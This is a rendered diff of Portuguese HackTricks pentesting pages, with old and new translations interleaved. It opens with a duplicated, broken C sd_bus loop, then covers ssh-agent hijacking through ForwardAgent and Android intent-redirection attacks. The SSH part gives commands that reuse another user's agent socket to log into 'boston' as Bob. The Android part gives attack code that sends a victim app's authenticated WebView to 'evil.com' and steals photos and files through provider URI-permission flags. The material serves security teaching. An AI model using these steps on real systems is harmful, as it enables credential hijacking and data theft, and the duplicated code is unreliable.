/* Infinite loop to process the client requests */
for (;;) {
/* Process requests */
r = sd_bus_process(bus, NULL);
if (r < 0) {
fprintf(stderr, "Failed to process bus: %s\n", strerror(-r));
goto finish;
}
if (r > 0) /* we processed a request, try to process another one, right-away */
continue;
/* Infinite loop to process the client requests */
for (;;) {
/* Process requests */
r = sd_bus_process(bus, NULL);
if (r < 0) {
fprintf(stderr, "Failed to process bus: %s\n", strerror(-r));
goto finish;
}
if (r > 0) /* we processed a request, try to process another one, right-away */
continue;
/* Wait for the next request to process */
r = sd_bus_wait(bus, (uint64_t) -1);
if (r < 0) {
fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r));
goto finish;
}
}
/* Wait for the next request to process */
r = sd_bus_wait(bus, (uint64_t) -1);
if (r < 0) {
fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r));
goto finish;
}
}
finish:
sd_bus_slot_unref(slot);
sd_bus_unref(bus);
sd_bus_slot_unref(slot);
sd_bus_unref(bus);
return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}
```
{% endcode %}
# Referências
* [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

86
linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
View file

@ -1,27 +1,27 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
# Resumo
O que você pode fazer se descobrir dentro do `/etc/ssh_config` ou dentro da configuração `$HOME/.ssh/config` isto:
O que você pode fazer se descobrir dentro do `/etc/ssh_config` ou dentro de `$HOME/.ssh/config` esta configuração:
```
ForwardAgent yes
```
Se você é root dentro da máquina, provavelmente pode **acessar qualquer conexão ssh feita por qualquer agente** que você encontrar no diretório _/tmp_
Se você é root dentro da máquina, provavelmente pode **acessar qualquer conexão ssh feita por qualquer agente** que você possa encontrar no diretório _/tmp_
Personificar Bob usando um dos ssh-agent de Bob:
Impersonate Bob usando um dos ssh-agent de Bob:
```bash
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
```
@ -29,43 +29,43 @@ SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
Quando você define a variável `SSH_AUTH_SOCK`, você está acessando as chaves de Bob que foram usadas na conexão ssh de Bob. Então, se a chave privada dele ainda estiver lá (normalmente estará), você poderá acessar qualquer host usando-a.
Como a chave privada é salva na memória do agente descriptografada, suponho que, se você for Bob mas não souber a senha da chave privada, ainda poderá acessar o agente e usá-lo.
Como a chave privada é salva na memória do agente sem criptografia, suponho que se você for Bob, mas não souber a senha da chave privada, ainda poderá acessar o agente e usá-lo.
Outra opção é que o usuário proprietário do agente e o root possam acessar a memória do agente e extrair a chave privada.
Outra opção é que o usuário proprietário do agente e o root podem ser capazes de acessar a memória do agente e extrair a chave privada.
# Explicação longa e exploração
# Explicação detalhada e exploração
**Retirado de:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)
**Sirva este post como uma máquina do tempo do post agora deletado de:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)
## **Quando ForwardAgent Não Pode Ser Confiável**
## **Quando ForwardAgent não pode ser confiável**
SSH sem senhas torna a vida com sistemas operacionais semelhantes ao Unix muito mais fácil. Se sua rede requer sessões ssh encadeadas (para acessar uma rede restrita, por exemplo), o encaminhamento de agente se torna extremamente útil. Com o encaminhamento de agente, é possível para mim conectar do meu laptop ao meu servidor de desenvolvimento e de lá executar um svn checkout de outro servidor, tudo sem senhas, mantendo minha chave privada segura na minha estação de trabalho local.
SSH sem senhas facilita a vida com sistemas operacionais semelhantes ao Unix. Se sua rede requer sessões ssh encadeadas (para acessar uma rede restrita, por exemplo), o encaminhamento do agente se torna extremamente útil. Com o encaminhamento do agente, é possível conectar-se do meu laptop ao meu servidor de desenvolvimento e, a partir daí, executar um checkout svn de outro servidor, tudo sem senhas, mantendo minha chave privada segura em minha estação de trabalho local.
Isso pode ser perigoso, no entanto. Uma rápida pesquisa na web revelará vários artigos indicando que isso só é seguro se os hosts intermediários forem confiáveis. Raramente, no entanto, você encontrará uma explicação do _porquê_ isso é perigoso.
No entanto, isso pode ser perigoso. Uma rápida pesquisa na web revelará vários artigos indicando que isso é seguro apenas se os hosts intermediários forem confiáveis. No entanto, raramente você encontrará uma explicação do _porquê_ é perigoso.
É para isso que serve este artigo. Mas primeiro, um pouco de contexto.
É para isso que este artigo serve. Mas primeiro, um pouco de contexto.
## **Como Funciona a Autenticação Sem Senha**
## **Como a Autenticação sem Senha Funciona**
Ao autenticar no modo normal, o SSH usa sua senha para provar que você é quem diz ser. O servidor compara um hash desta senha com um que possui em arquivo, verifica se os hashes correspondem e permite sua entrada.
Ao autenticar no modo normal, o SSH usa sua senha para provar que você é quem diz ser. O servidor compara um hash dessa senha com um que ele tem em arquivo, verifica se os hashes correspondem e permite sua entrada.
Se um atacante for capaz de quebrar a criptografia usada para proteger sua senha enquanto ela é enviada ao servidor, ele pode roubá-la e fazer login como você quando desejar. Se um atacante for permitido realizar centenas de milhares de tentativas, ele pode eventualmente adivinhar sua senha.
Se um atacante conseguir quebrar a criptografia usada para proteger sua senha enquanto ela está sendo enviada para o servidor, ele pode roubá-la e fazer login como você sempre que desejar. Se um atacante puder realizar centenas de milhares de tentativas, eventualmente poderá adivinhar sua senha.
Um método de autenticação muito mais seguro é a [autenticação por chave pública](http://www.ibm.com/developerworks/library/l-keyc/index.html), uma maneira de fazer login sem uma senha. A autenticação por chave pública requer um par combinado de chaves pública e privada. A chave pública criptografa mensagens que só podem ser descriptografadas com a chave privada. O computador remoto usa sua cópia da sua chave pública para criptografar uma mensagem secreta para você. Você prova que é você descriptografando a mensagem usando sua chave privada e enviando a mensagem de volta ao computador remoto. Sua chave privada permanece segura em seu computador local o tempo todo, protegida de ataques.
Um método de autenticação muito mais seguro é a [autenticação de chave pública](http://www.ibm.com/developerworks/library/l-keyc/index.html), uma forma de fazer login sem senha. A autenticação de chave pública requer um par correspondente de chaves pública e privada. A chave pública criptografa mensagens que só podem ser descriptografadas com a chave privada. O computador remoto usa sua cópia da sua chave pública para criptografar uma mensagem secreta para você. Você prova que é você descriptografando a mensagem usando sua chave privada e enviando a mensagem de volta para o computador remoto. Sua chave privada permanece segura em seu computador local o tempo todo, protegida contra ataques.
A chave privada é valiosa e deve ser protegida, portanto, por padrão, é armazenada em um formato criptografado. Infelizmente, isso significa digitar sua frase de acesso de criptografia antes de usá-la. Muitos artigos sugerem o uso de chaves privadas sem frase de acesso (não criptografadas) para evitar esse inconveniente. Isso é uma má ideia, pois qualquer pessoa com acesso à sua estação de trabalho (por acesso físico, roubo ou hackeamento) agora também tem acesso livre a qualquer computador configurado com sua chave pública.
A chave privada é valiosa e deve ser protegida, então por padrão ela é armazenada em um formato criptografado. Infelizmente, isso significa inserir sua frase de senha de criptografia antes de usá-la. Muitos artigos sugerem usar chaves privadas sem frase de senha (não criptografadas) para evitar esse inconveniente. Isso é uma má ideia, pois qualquer pessoa com acesso à sua estação de trabalho (via acesso físico, roubo ou hackeamento) agora também tem acesso livre a quaisquer computadores configurados com sua chave pública.
O OpenSSH inclui [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), um daemon que é executado em sua estação de trabalho local. Ele carrega uma cópia descriptografada da sua chave privada na memória, para que você só tenha que digitar sua frase de acesso uma vez. Ele então fornece um [socket](http://en.wikipedia.org/wiki/Unix\_domain\_socket) local que o cliente ssh pode usar para pedir que ele descriptografe a mensagem criptografada enviada de volta pelo servidor remoto. Sua chave privada permanece seguramente aconchegada na memória do processo ssh-agent enquanto ainda permite que você se mova por aí com ssh sem digitar senhas.
O OpenSSH inclui o [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), um daemon que é executado em sua estação de trabalho local. Ele carrega uma cópia descriptografada de sua chave privada na memória, para que você só precise inserir sua frase de senha uma vez. Em seguida, ele fornece um [socket](http://en.wikipedia.org/wiki/Unix\_domain\_socket) local que o cliente ssh pode usar para pedir a ele para descriptografar a mensagem criptografada enviada de volta pelo servidor remoto. Sua chave privada permanece seguramente protegida na memória do processo ssh-agent, permitindo que você faça ssh sem digitar senhas.
## **Como Funciona o ForwardAgent**
## **Como o ForwardAgent Funciona**
Muitas tarefas requerem "encadear" sessões ssh. Considere meu exemplo anterior: eu faço ssh do meu workstation para o servidor de desenvolvimento. Enquanto estou lá, preciso realizar um svn update, usando o protocolo "svn+ssh". Como seria absurdo deixar uma cópia descriptografada da minha chave privada super-secreta em um servidor compartilhado, agora estou preso com autenticação por senha. No entanto, se eu habilitasse "ForwardAgent" na configuração ssh do meu workstation, o ssh usaria suas capacidades de tunelamento embutidas para criar outro socket no servidor de desenvolvimento que é tunelado de volta para o socket do ssh-agent na minha estação de trabalho local. Isso significa que o cliente ssh no servidor de desenvolvimento agora pode enviar solicitações de "descriptografe esta mensagem secreta" diretamente de volta para o ssh-agent em execução na minha estação de trabalho, autenticando-se ao servidor svn sem nunca ter acesso à minha chave privada.
Muitas tarefas exigem sessões ssh "encadeadas". Considere meu exemplo anterior: eu faço ssh da minha estação de trabalho para o servidor de desenvolvimento. Enquanto estiver lá, preciso realizar uma atualização svn, usando o protocolo "svn+ssh". Como seria bobo deixar uma cópia não criptografada da minha supersecreta chave privada em um servidor compartilhado, agora estou preso com autenticação por senha. No entanto, se eu habilitar o "ForwardAgent" na configuração ssh da minha estação de trabalho, o ssh usa suas capacidades de tunelamento embutidas para criar outro socket no servidor de desenvolvimento que é tunelado de volta para o socket do ssh-agent em minha estação de trabalho local. Isso significa que o cliente ssh no servidor de desenvolvimento agora pode enviar solicitações de "descriptografar esta mensagem secreta" diretamente de volta para o ssh-agent em execução em minha estação de trabalho, autenticando-se no servidor svn sem nunca ter acesso à minha chave privada.
## **Por Que Isso Pode Ser Perigoso**
## **Por que Isso Pode Ser Perigoso**
Simplificando, qualquer pessoa com privilégio de root no servidor intermediário pode fazer uso livre do seu ssh-agent para autenticar-se em outros servidores. Uma demonstração simples mostra como isso pode ser feito trivialmente. Nomes de host e usuários foram alterados para proteger os inocentes.
Simplesmente, qualquer pessoa com privilégios de root no servidor intermediário pode usar livremente seu ssh-agent para se autenticar em outros servidores. Uma simples demonstração mostra o quão trivialmente isso pode ser feito. Os nomes de host e usuários foram alterados para proteger os inocentes.
Meu laptop está executando ssh-agent, que se comunica com os programas cliente ssh por meio de um socket. O caminho para este socket é armazenado na variável de ambiente SSH\_AUTH\_SOCK:
Meu laptop está executando o ssh-agent, que se comunica com os programas clientes ssh por meio de um socket. O caminho para este socket é armazenado na variável de ambiente SSH\_AUTH\_SOCK:
```
mylaptop:~ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners
@ -85,7 +85,7 @@ mylaptop:~ alice$ ssh seattle
seattle:~ $ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990
```
Embora minhas chaves não estejam instaladas em "seattle", os programas cliente ssh ainda conseguem acessar o agente em execução na minha máquina local:
Mesmo que minhas chaves não estejam instaladas em "seattle", os programas cliente ssh ainda conseguem acessar o agente em execução em minha máquina local:
```
seattle:~ alice $ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
@ -102,7 +102,7 @@ charlie pts/23 2012-04-06 13:10 (office.example.com)
charlie pts/27 2012-04-03 12:32 (office.example.com)
bob pts/29 2012-04-02 10:58 (office.example.com)
```
Eu nunca gostei do Bob. Para encontrar a conexão do agente dele, preciso localizar o processo filho de uma das sessões ssh dele:
Nunca gostei do Bob. Para encontrar a conexão do agente dele, preciso encontrar o processo filho de uma das sessões ssh dele:
```
seattle:~ alice $ sudo -s
[sudo] password for alice:
@ -112,7 +112,7 @@ sshd(16816)───bash(16817)
sshd(25296)───bash(25297)───vim(14308)
```
Existem várias maneiras de o root visualizar o ambiente de um processo em execução. No Linux, os dados estão disponíveis em /proc/\<pid>/environ. Como eles são armazenados em strings terminadas em NULL, usarei o tr para converter os NULLs em novas linhas:
Existem várias maneiras para o root visualizar o ambiente de um processo em execução. No Linux, os dados estão disponíveis em /proc/<pid>/environ. Como eles são armazenados em strings terminadas por NULL, vou usar o tr para converter os NULLs em novas linhas:
```
seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816
@ -122,7 +122,7 @@ Agora tenho tudo o que preciso saber para sequestrar o ssh-agent do Bob:
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l
2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA)
```
Caso eu tenha um alvo específico em mente, agora devo ser capaz de me conectar diretamente. Caso contrário, apenas observar a lista de processos ou pesquisar no arquivo de histórico do Bob deve apresentar várias oportunidades de alvo. Neste caso, sei que o Bob tem todos os tipos de arquivos super secretos armazenados no servidor chamado "boston":
Se eu tiver um alvo específico em mente, agora devo ser capaz de me conectar diretamente. Caso contrário, apenas observar a lista de processos ou pesquisar no arquivo de histórico do Bob deve apresentar muitos alvos de oportunidade. Neste caso, eu sei que o Bob tem todos os tipos de arquivos super secretos armazenados no servidor chamado "boston":
```
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
bob@boston:~$ whoami
@ -130,9 +130,9 @@ bob
```
## **Proteja-se!**
Não permita que seu ssh-agent armazene suas chaves indefinidamente. No OS X, configure seu Keychain para bloquear após inatividade ou quando a tela for bloqueada. Em outras plataformas Unix, use a opção -t com o ssh-agent para que suas chaves sejam removidas após segundos.
Não permita que seu ssh-agent armazene suas chaves indefinidamente. No OS X, configure sua Keychain para bloquear após inatividade ou quando a tela é bloqueada. Em outras plataformas Unix, passe a opção -t para o ssh-agent para que suas chaves sejam removidas após segundos.
Não habilite o encaminhamento de agente ao conectar-se a hosts não confiáveis. Felizmente, a sintaxe \~/.ssh/config torna isso bastante simples:
Não habilite o encaminhamento do agente ao se conectar a hosts não confiáveis. Felizmente, a sintaxe \~/.ssh/config torna isso bastante simples:
```
Host trustworthyhost
ForwardAgent yes
@ -146,20 +146,20 @@ ForwardAgent no
* [Gerenciamento de chaves OpenSSH](http://www.ibm.com/developerworks/library/l-keyc/index.html) Daniel Robbins
* [Um Guia Ilustrado para Encaminhamento de Agente SSH](http://www.unixwiz.net/techtips/ssh-agent-forwarding.html) Steve Friedl
* [manual do ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent)
* [manual do ssh-add](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add)
* [Manual do ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent)
* [Manual do ssh-add](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-add)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

534
mobile-pentesting/android-app-pentesting/README.md
View file

File diff suppressed because it is too large Load diff

281
mobile-pentesting/android-app-pentesting/intent-injection.md
View file

@ -1,264 +1,31 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
**Pesquisa retirada de** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
# Introdução
Esta vulnerabilidade se assemelha ao **Open Redirect em segurança web**. Como a classe `Intent` é `Parcelable`, **objetos pertencentes a esta classe** podem ser **passados** como **dados extras** em outro objeto `Intent`. \
Muitos desenvolvedores fazem **uso** desta **funcionalidade** e criam **componentes proxy** (atividades, receptores de transmissão e serviços) que **recebem um Intent embutido e o passam para métodos perigosos** como `startActivity(...)`, `sendBroadcast(...)`, etc. \
Isso é perigoso porque **um atacante pode forçar o aplicativo a iniciar um componente não exportado que não pode ser iniciado diretamente de outro aplicativo**, ou conceder ao atacante acesso aos seus provedores de conteúdo. **`WebView`** também às vezes converte uma **URL de uma string para um objeto `Intent`**, usando o método `Intent.parseUri(...)`, e o passa para `startActivity(...)`.
{% hint style="info" %}
Resumindo: Se um atacante pode enviar um Intent que está sendo executado de forma insegura, ele pode potencialmente acessar componentes não exportados e abusar deles.
{% endhint %}
# Um caso típico
Vamos examinar um exemplo. Fragmento do arquivo `AndroidManifest.xml`
```markup
<activity android:name=".ProxyActivity" android:exported="true" />
<activity android:name=".AuthWebViewActivity" android:exported="false" />
```
Atividade `ProxyActivity`
```java
startActivity((Intent) getIntent().getParcelableExtra("extra_intent"));
```
Atividade `AuthWebViewActivity`
```java
webView.loadUrl(getIntent().getStringExtra("url"), getAuthHeaders());
```
`AuthWebViewActivity` é um exemplo de **funcionalidade oculta do aplicativo que executa certas ações inseguras**, neste caso passando a sessão de autenticação do usuário para uma URL obtida a partir do parâmetro `url`.
Restrições de exportação significam que **o atacante não pode acessar `AuthWebViewActivity` diretamente**. Uma chamada direta
```java
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.AuthWebViewActivity");
intent.putExtra("url", "http://evil.com/");
startActivity(intent);
```
lança uma `java.lang.SecurityException`, devido à `Negativa de Permissão`: `AuthWebViewActivity não exportado do uid 1337`.
Mas o atacante pode **forçar a vítima a iniciar o `AuthWebViewActivity` por si mesma**:
```java
Intent extra = new Intent();
extra.setClassName("com.victim", "com.victim.AuthWebViewActivity");
extra.putExtra("url", "http://evil.com/");
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.ProxyActivity");
intent.putExtra("extra_intent", extra);
startActivity(intent);
```
e nenhuma violação de segurança ocorrerá, porque **o app que está sob ataque tem acesso a todos os seus próprios componentes**. Usando este fragmento de código, o atacante pode contornar as restrições integradas do sistema Android.
# Escalada de Impacto
Para escalar o impacto desta vulnerabilidade, você precisa **encontrar outras vulnerabilidades/configurações incorretas que possam permitir aumentar o impacto da vulnerabilidade** (já que a vulnerabilidade por si só não está criando riscos).
## Escalada de ataques via Content Providers
Além do acesso a componentes arbitrários do app original, o **atacante pode tentar obter acesso aos Content Providers do app vulnerável** que satisfaçam as seguintes condições:
* ele deve ser **não exportado** (caso contrário, **poderia ser atacado diretamente**, sem usar a vulnerabilidade que estamos discutindo neste artigo)
* ele deve ter a flag **`android:grantUriPermissions`** definida como **`true`**.
* `android:grantUriPermissions="true"` indica que seu código Java pode usar `FLAG_GRANT_READ_URI_PERMISSION` e `FLAG_GRANT_WRITE_URI_PERMISSION` para **qualquer `Uri` fornecido por aquele `ContentProvider`**.
* `android:grantUriPermissions="false"` indica que **apenas os valores de `Uri` especificados pelos elementos filhos `<grant-uri-permission>`** podem ser usados com `FLAG_GRANT_READ_URI_PERMISSION` e `FLAG_GRANT_WRITE_URI_PERMISSION`.
O atacante deve se configurar como o destinatário de um intent embutido e definir as seguintes flags
* `Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION` permite acesso persistente ao provedor (sem esta flag, o acesso é apenas uma vez)
* `Intent.FLAG_GRANT_PREFIX_URI_PERMISSION` permite acesso ao URI por prefixo por exemplo, em vez de obter acesso separado repetidamente usando um caminho completo como `content://com.victim.provider/image/1`, o atacante pode conceder acesso a todo o conteúdo do provedor usando o URI `content://com.victim.provider/` e depois usar `ContentResolver` para endereçar `content://com.victim.provider/image/1`, `content://com.victim.provider/image/2`, etc.
* `Intent.FLAG_GRANT_READ_URI_PERMISSION` permite operações de leitura no provedor (como `query`, `openFile`, `openAssetFile`)
* `Intent.FLAG_GRANT_WRITE_URI_PERMISSION` permite operações de escrita
Um exemplo de um provedor típico onde um atacante pode obter acesso e realizar operações regulares como `query`, `update`, `insert`, `delete`, `openFile`, `openAssetFile`
```markup
<provider android:name="com.victim.ContentProvider" android:exported="false" android:authorities="com.victim.provider" android:grantUriPermissions="true"/>
```
Exemplo de roubo de fotos do usuário no arquivo `AndroidManifest.xml`
```markup
<activity android:name=".LeakActivity" android:exported="true" />
```
Arquivo `MainActivity.java`
```java
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
| Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
| Intent.FLAG_GRANT_READ_URI_PERMISSION
| Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.attacker.LeakActivity");
extra.setData(Uri.parse("content://com.victim.provider/"));
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.ProxyActivity");
intent.putExtra("extra_intent", extra);
startActivity(intent);
```
`LeakActivity.java`
```java
Uri uri = Uri.parse(getIntent().getDataString() + "image/1")); // content://com.victim.provider/image/1
Bitmap bitmap = BitmapFactory.decodeStream(getContentResolver().openInputStream(uri)); // stolen image
```
## Ataques ao Android File Provider
Esta vulnerabilidade também possibilita ao atacante **roubar arquivos de aplicativos** localizados em diretórios predeterminados pelo desenvolvedor. Para um ataque bem-sucedido, o aplicativo malicioso precisa **obter direitos de acesso ao Android File Provider e depois ler o conteúdo do provedor de arquivos usando o Android ContentResolver**.
Exemplo de provedor de arquivos (para mais detalhes, consulte [https://developer.android.com/reference/android/support/v4/content/FileProvider](https://developer.android.com/reference/android/support/v4/content/FileProvider))
```markup
<provider android:name="androidx.core.content.FileProvider" android:exported="false" android:authorities="com.victim.files_provider" android:grantUriPermissions="true">
<meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/provider_paths"/>
</provider>
```
Ele fornece acesso de leitura/escrita a arquivos em uma lista especial que pode ser encontrada nos recursos do aplicativo, neste caso em `res/xml/provider_paths.xml`
Pode parecer algo como
```markup
<?xml version="1.0" encoding="utf-8"?>
<paths>
<root-path name="root" path=""/>
<files-path name="internal_files" path="."/>
